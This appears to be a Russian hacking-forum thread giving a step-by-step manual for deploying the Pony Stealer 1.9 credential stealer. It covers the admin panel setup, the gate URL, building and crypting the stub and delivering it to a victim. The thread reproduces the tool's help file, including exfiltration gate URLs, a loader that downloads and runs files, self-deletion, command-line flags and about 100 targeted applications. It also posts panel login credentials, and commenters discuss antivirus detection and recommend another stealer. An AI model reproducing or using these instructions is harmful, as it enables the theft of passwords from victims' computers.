• Привет !

    На форуме есть зеркало в ТОРе:rusfwz3cukdej7do.onion

    Обратная связь:info@ru-sfera.org

    Всего доброго !

Pony Stealer 1.9 (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 774
Если судит по многочиленныым отзывам, то это один из лучших стилеров.Решил проверить, а заодно и написать пошаговый мануальчик по его использованию (хотя всё предельно ясно, если вы уже пользовались подобным софтом).
FAR Manager
* Total Commander
* WS_FTP
* CuteFTP
* FlashFXP
* FileZilla
* FTP Commander
* BulletProof FTP
* SmartFTP
* TurboFTP
* FFFTP
* CoffeeCup FTP
* CoreFTP
* FTP Explorer
* Frigate3 FTP
* SecureFX
* UltraFXP
* FTPRush
* WebSitePublisher
* BitKinex
* ExpanDrive
* ClassicFTP
* Fling
* SoftX
* Directory Opus
* FreeFTP
* DirectFTP (определяется как FreeFTP)
* LeapFTP
* WinSCP
* 32bit FTP
* NetDrive
* WebDrive
* FTP Control
* Opera
* WiseFTP
* FTP Voyager
* Firefox
* FireFTP
* SeaMonkey
* Flock
* Mozilla Suite Browser
* LeechFTP
* Odin Secure FTP Expert
* WinFTP
* FTP Surfer
* FTPGetter
* ALFTP
* Internet Explorer
* Dreamweaver
* DeluxeFTP
* Google Chrome
* Chromium
* SRWare Iron (определяется как Chromium)
* ChromePlus
* Bromium (Yandex Chrome)
* Nichrome
* Comodo Dragon
* RockMelt
* K-Meleon
* Epic
* Staff-FTP
* AceFTP
* Global Downloader
* FreshFTP
* BlazeFTP
* NETFile
* GoFTP
* 3D-FTP
* Easy FTP
* Xftp
* FTP Now
* Robo-FTP
* LinasFTP
* Cyberduck
* Putty
* Notepad++ (NppFTP)
* CoffeeCup Visual Site Designer
* CoffeeCup Sitemapper (определяется как CoffeeCup FTP)
* FTPShell
* FTPInfo
* NexusFile
* FastStone Browser
* CoolNovo
* WinZip
* Yandex.Internet
* MyFTP
* sherrod FTP
* NovaFTP
* Windows Mail
* Windows Live Mail
* Pocomail
* Becky!
* IncrediMail
* The Bat!
* Outlook
* Thunderbird
* FastTrackFTP
1.Зарегистрируем аккаунт, например на hostinger.ru (если честно дерьмовый хостинг, но для ерунды пойдёт). Там сейчас интерфейс поменяли, добавили какие-то фичи ... и теперь на хак форумах продают новые дырки в хостингере)
Закажите Наши Бесплатные Услуги - Mozilla Firefox.png

2.Создадим БД (базу данных).
Базы Данных MySQL - Google Chrome.png


3.Загрузим файлы из папки "Panel",которая находится в архиве с программой,на наш хостинг.
u16165143831.170.164.69 - FileZilla.png

5.Изменим содержание файла config.php, внеся данные нашей БД.
CUsersuserAppDataLocalTempfz3temp-1config.php - Notepad++.png


6.Теперь перейдём по адресу http://вашхост.ру/setup.php (в моём случае http://ponystealer.hol.es/setup.php),где увидим окошко установщика.Придумаем и введём логин и пароль для нашей админки.
[Tutorial] Setup Pony 1.9 Stealer {Updated} +DOWNLOAD - Mozilla Firefox.png


7.Жмём "Установить" и видим надпись о том, что установка завершена и мы можем перейти в панель администрирования.
ponystealer.hol.essetup.php - Google Chrome.png

8.Переходим на вкладку "Управление", выбираем пункт"Параметры сервера"
и придумываем пароль для того, чтобы мы могли в дальнейшем расшифровать отчёты (которые Пони шифрует). Всё с виртуальной частью мы закончили.
Pony - Admin panel - Google Chroume.png


9.Переходим в папку с нашим билдером и запускаем PonyBuilder.exe
windows 8 (Виндовс 8.1) [Работает] - Oracle VM VirtualBox.png


10.Во вкладке "Builder" прописываем путь до гейта http://вашхост.ру/gate.php (в моём случае http://ponystealer.hol.es/gate.php)
windows 8 (Виндовс 8.1) [Работает] - Oracleап VM VirtualBox.png

11.Вкладка "Loader", тоесть загрузчик файлов.После сбора паролей с указанных линков (URL) будут загружены и запущены файлы.
windows 8 (Виндовс 8.1) [Работает] - Oracle VM VirtкауualBox.png
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 774
12.Вкладка "Settings",обязательно установить тот же пароль на дешифровку отчётов (см.пункт 8).По другим параметрам на этой вкладке,я думаю понятно,если не совсем,то вся информация есть в файле help.txt в папке с программой.(Последняя вкладка изменить скин)
windows 8 (Виндовс 8.1) [Работает] - Oracle VM VirсаыаtualBox.png

13.Возвращаемся на вкладку "Builder" где мы можем выбрать иконку для нашего билда стилера и создать его,нажав на кнопку "Create Stub"
windows 8 (Виндовс 8.1) [Работает] - Oracle VкакуM VirtualBox.png

14.Вот и всё.Теперь осталось только закриптовать наш новоявленный файл и вручить его жертве.Да и ещё на папку temp ставим права 777.


ВАЖНО!ПРОЧИТАЙТЕ HELP.TXT НЕКОТОРЫЕ МОМЕНТЫ ТАМ ОПИСАНЫ БОЛЕЕ ПОДРОБНО!(например варианты сборки билда стилера:в виде экзешника или в виде ddl-файла)
Отчёты с найденными на компе жертвы паролями вы найдёте на вкладке Reports (в админке).
Pony - Admin panel - Google Cпваhrome.png

Удачного стилинга!

###########################################
#Leaked for TrojanForge.com
###########################################


-=- Система сбора FTP паролей "Pony" -=-

Билдер "PonyBuilder.exe"
========================

Задача билдера - настроить и скомпилировать клиент "Pony.exe", который необходимо прогружать на зараженные компьютеры.

Комплект поставки:

* Папка "masm32" - компилятор Microsoft Macro Assembler (MASM).
* Папка "PonySrc" - исходный код на языке MASM программы-клиента (граббера) "Pony.exe".
* Папка "BuilderSrc" - исходный код на языке Delphi 7 вспомогательной программы-билдера "PonyBuilder.exe".
* Файл "PonyBuilder.exe" - программа-билдер для клиента "Pony.exe".
* Файл "Help.txt" - файл помощи.
* Файл "build.bat" - скрипт используемый билдером для компиляции билда из исходников "PonySrc".
* Файл "Pony.ico" - иконка прикрепляемая к "Pony.exe" при компиляции, если в билдере выбрана соответсвующая опция.

Интерфейс разделен на 4 закладки:

1. Билдер
Текстовое поле "Список URL для отправки паролей" - здесь можно прописать список URL гейтов для отправки паролей.
Каждая строка - отдельный URL, к примеру: http://somedomain.com/dir/gate.php
Можно добавить неограниченное количество строк (URL), один и тот же URL можно добавить несколько раз.
Домен может содержать информацию о порте подключения, к примеру: http://privatedomain.com:8080/gate.php
Протокол https:// на данный момент не поддерживается.
"Pony.exe" будет пытаться подключиться и отправить отчет с паролями по списку, если данные будет успешно доставлены,
программа немедленно завершит работу без попыток подключения к остальным URL.

Кнопка "Выбрать иконку" позволяет установить иконку для компилируемого файла, поддерживается только формат *.ico.
Кнопка "Создать билд" компилирует файл "Pony.exe" с заданными настройками.

2. Лоадер
Простой лоадер (загрузчик файлов). После сбора паролей с указанных линков (URL) будут загружены и запущены файлы.
URL задаются таким же образом, как и список доменов для отправки паролей.
В нижней части закладки можно задать следующие опции:
* Активировать лоадер - включить работу лоадера, иначе файлы загружаться не будут.
* Не запускать одинаковые файлы дважды - после успешного запуска скачанного файла в реестр будет добавлено контрольное значение
(хеш) данных файла, после чего, при повторной загрузке, дубликат запущен не будет.

3. Настройки
Для того, чтобы увидеть все настройки, нужно активировать опцию "Показать продвинутые настройки" в главном меню.
* Сжимать - сжимать отчеты с помощью библиотеки aPLib, прибавляет около 5Кб к размеру исполняемого файла,
хорошо пакует текстовые данные перед отправкой, настоятельно рекомендуется использовать, сильно снижает трафик
к серверу.
* Шифровать - шифровать отчеты алгоритмом RC4.
* Пароль шифрования - пароль, которым шифруются отчеты, аналогичный пароль необходимо установить в настройках сервера.
* Сохранять отчеты на диск (для отладки) - при запуске "Pony.exe", после того как были собраны пароли, в той же папке
где был запущен исполняемый файл, будет создан файл "out.bin", это контейнер с паролями в таком виде, в каком он отправляется
на сервер для последующей обработки (дешифровки).
* Отсылать пустые отчеты (для статистики) - обычно, если ни одного пароля не найдено, клиент "Pony.exe" ничего отправлять
серверу не будет, но иногда полезно включение данной опции для получения статистики о количестве успешных запусков "Pony.exe".
* Режим отладки - снимает перехватчик исключений, убирает код затрудняющий отладку и дизассемблирование программы, использовать исключительно в целях отладки.
* Отсылать только новые отчеты - если опция не активирована, тогда дублирующие отчеты с паролями отправляться не будут.
* Самоудаление - запущенный файл "Pony.exe" будет удален после того как завершит свою работу.
* Добавить иконку - прикрепить выбранную иконку к компилируемому файлу.
* Паковать билд с помощью UPX - сжать исполняемый файл "Pony.exe" после компиляции.
* Количество попыток отправить отчет - сколько раз пытаться отправить отчет при неуспешной передаче, рекомендуется указать минимум 2 попытки
* Вариант сборки:
* Exe-файл - обычный исполняемый файл Windows (*.exe)
* Dll-файл - вариант сборки в виде .dll библиотеки, она абсолютно автономна, для отработки необходимо вызвать из вашего проекта лишь API-функцию LoadLibrary(), т.е. URL для отправки паролей
и все настройки вшиваются в сам .dll файл. В папке DllTest лежит простой пример использования-тестирования, в эту же папку необходимо положить файл Pony.dll, после чего запустить файл DllTest.exe,
который в свою очередь вызывает LoadLibrary() для .dll библиотеки.

В списке "Доступные модули дешифровки" можно исключить из билда ненужные дешифровщики паролей, это уменьшит размер билда.

4. Скин
На этой закладке можно выбрать понравившийся скин (шкурку) билдера.

Запуск билдера с командной строки
=================================

Доступны следующие аргументы командной строки билдера:
-PACK_REPORT - сжимать отчеты
-ENCRYPT_REPORT - шифровать отчеты, если пароль шифрования не задан, то по умолчанию будет указан "Mesoamerica"
-REPORT_PASSWORD= - пароль шифрования, к примеру: -REPORT_PASSWORD=Mesoamerica
-SAVE_REPORT - сохранять отчеты на диск (для отладки)
-ENABLE_DEBUG_MODE - режим отладки
-SEND_MODIFIED_ONLY - отсылать только новые отчеты
-SELF_DELETE - активировать самоудаление
-SEND_EMPTY_REPORTS - отсылать пустые отчеты
-ADD_ICON - прикрепить иконку из файла Pony.ico
-UPX - паковать билд с помощью UPX
-DOMAIN_LIST= - список доменов, каждый домен должен быть разделен с помощью спец. символа \n, к примеру: -DOMAIN_LIST=http://host.com/gate.php\nhttp://host2.com/x/gate.php
-LOADER_LIST= - список URL для лоадера (будет активирован автоматически при наличии URL), каждый URL должен быть разделен аналогично DOMAIN_LIST
-LOADER_EXECUTE_NEW_FILES_ONLY - не запускать одинаковые файлы дважды
-DISABLE_MODULE= - исключить из билда определенный модуль дешифровки (все названия модулей можно увидеть в файле PonySrc\FTPClients.asm), к примеру: -DISABLE_MODULE=MODULE_OPERA
-DLL_MODE - использовать вариант сборки в виде Dll-библиотеки
-COLLECT_HTTP - дополнительно собирать и HTTP/HTTPS пароли
-COLLECT_EMAIL - дополнительно собирать и E-mail пароли (POP3, IMAP, SMTP)
-UPLOAD_RETRIES=N - количество (N) попыток отправить отчет, если значение не указано, то по умолчанию используются 2 попытки

Клиент "Pony.exe"
=================

Задача "Pony.exe" - собрать пароли с компьютера и отправить их на сервер для последующей обработки.

Работает на всех NT версиях Windows, начиная с Win98, включая серверные. Поддерживается работа в режиме x86 и x64.
Программа нормально отрабатывает при запуске с правами администратора или пользователя.

Перед распространением файл желательно почистить и криптануть.

Реализована мгновенная дешифровка сохраненных паролей для следующих программ:
* FAR Manager
* Total Commander
* WS_FTP
* CuteFTP
* FlashFXP
* FileZilla
* FTP Commander
* BulletProof FTP
* SmartFTP
* TurboFTP
* FFFTP
* CoffeeCup FTP
* CoreFTP
* FTP Explorer
* Frigate3 FTP
* SecureFX
* UltraFXP
* FTPRush
* WebSitePublisher
* BitKinex
* ExpanDrive
* ClassicFTP
* Fling
* SoftX
* Directory Opus
* FreeFTP
* DirectFTP (определяется как FreeFTP)
* LeapFTP
* WinSCP
* 32bit FTP
* NetDrive
* WebDrive
* FTP Control
* Opera
* WiseFTP
* FTP Voyager
* Firefox
* FireFTP
* SeaMonkey
* Flock
* Mozilla Suite Browser
* LeechFTP
* Odin Secure FTP Expert
* WinFTP
* FTP Surfer
* FTPGetter
* ALFTP
* Internet Explorer
* Dreamweaver
* DeluxeFTP
* Google Chrome
* Chromium
* SRWare Iron (определяется как Chromium)
* ChromePlus
* Bromium (Yandex Chrome)
* Nichrome
* Comodo Dragon
* RockMelt
* K-Meleon
* Epic
* Staff-FTP
* AceFTP
* Global Downloader
* FreshFTP
* BlazeFTP
* NETFile
* GoFTP
* 3D-FTP
* Easy FTP
* Xftp
* FTP Now
* Robo-FTP
* LinasFTP
* Cyberduck
* Putty
* Notepad++ (NppFTP)
* CoffeeCup Visual Site Designer
* CoffeeCup Sitemapper (определяется как CoffeeCup FTP)
* FTPShell
* FTPInfo
* NexusFile
* FastStone Browser
* CoolNovo
* WinZip
* Yandex.Internet
* MyFTP
* sherrod FTP
* NovaFTP
* Windows Mail
* Windows Live Mail
* Pocomail
* Becky!
* IncrediMail
* The Bat!
* Outlook
* Thunderbird
* FastTrackFTP

Данные для доступа к админке экспериментальной Пони(обновлённые,так как той админке писец):
[HIDE=1]http://loshadka.esy.es/admin.php
Имя пользователя:Loshadka
Пароль:91@5yU$^dKMwug1[/HIDE]

Пасс на архив:111
 

Вложения

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 774
Сейчас попробовал на виртуальной восьмёрке.Сохранил пароль в IE,в последней версии Хрома,последней версии фаерфокса,в Filezilla.Пароли успешно пришли только с Хрома и Filezilla.Из старой версии IE пароль приходит.

Pony - Admin panel - Mozilla Firefox.png
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 774
Статья четырёхмесячной давности с xakep.ru....

Утечка исходного кода ботнета Pony привела к появлению множества форков
В последнее время средства массовой информации активно обсуждают находку SpiderLabs — базу данных с паролями, которую собрали владельцы одного из форков ботнета Pony. На голландском сервере нашли около 2 млн паролей от Facebook, Yahoo, Google Account, «Вконтакте» и «Одноклассников».
https://ru-sfera.org/data/MetaMirrorCache/www.xakep.ru_post_61717_pony1.png
https://ru-sfera.org/data/MetaMirrorCache/www.xakep.ru_post_61717_pony2.png
Специалисты SpiderLabs объясняют, что находка этого небольшого ботнета стала возможной благодаря тому, что в последнее время появилось много форков Pony 1.9 — и, соответственно, немало таких индивидуальных ботнетов. Распространение форков началось после того, как случилась утечка кода программы управления ботнетом Pony.
В коде можно найти единственный комментарий на русском языке.
Код:
date_default_timezone_set('Europe/Moscow');
 
(привет москва!)
Несмотря на привет Москве, специалисты сомневаются, что код написан русскими. Возможно, это иностранный разработчик написал заказ для российского клиента и вставил комментарий кириллицей, чтобы тому было приятно.
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
429
Репутация
130
Еще-бы вирустотал билда был бы очень кстати, или хотя-бы пара слов как на поняшу реагируют антивири :D
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 774
Еще-бы вирустотал билда был бы очень кстати, или хотя-бы пара слов как на поняшу реагируют антивири :D
Вообще-то все отчёты приложены.Естественно он палится практически всеми антивирями.Советую заюзать этот стилер (Black Stealer).Простой и работает вроде неплохо.
 

MIXA066

Уважаемый пользователь
Форумчанин
Регистрация
18.05.2014
Сообщения
429
Репутация
130
Z

Zema

Гость
не хрена не понял как его установить, все вроде правильно, а логи не шлет(( печаль беда
 
N

-NegaTiv-

Гость
А что за ошибка?

"gmp" extension installed - FAIL!
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 388
Репутация
7 878
Telegram